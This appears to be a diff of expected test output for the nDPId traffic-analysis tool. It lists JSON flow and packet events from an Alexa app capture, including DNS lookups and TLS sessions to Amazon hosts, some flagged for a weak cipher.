+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1490976041150,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976041150,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWlNAAEARM1+sECrYrBAqAdZmADUALY4\/ocgBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1490976041151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976041151,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR0jdAAEARu2qsECoBrBAq2AA11mYAPRDBociBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAUABDRe6IY="} 00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1490976041400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041400,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ul5AAEAGjJCsECrYNF7ohrJfAburivQiAAAAAKAC\/\/+w9wAAAgQFtAQCCAoA9k58AAAAAAEDAwg="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041428,"flow_last_seen":1490976041428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041428,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1490976041428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041428,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G65AAEAGvmusECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/V3gAAAgQFtAQCCAoA9k5+AAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041434,"flow_last_seen":1490976041434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1490976041434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041434,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hqRAAEAGEYasECrYwKgLAZX3H5Abo8jbAAAAAKAC\/\/+78QAAAgQFtAQCCAoA9k5\/AAAAAAEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 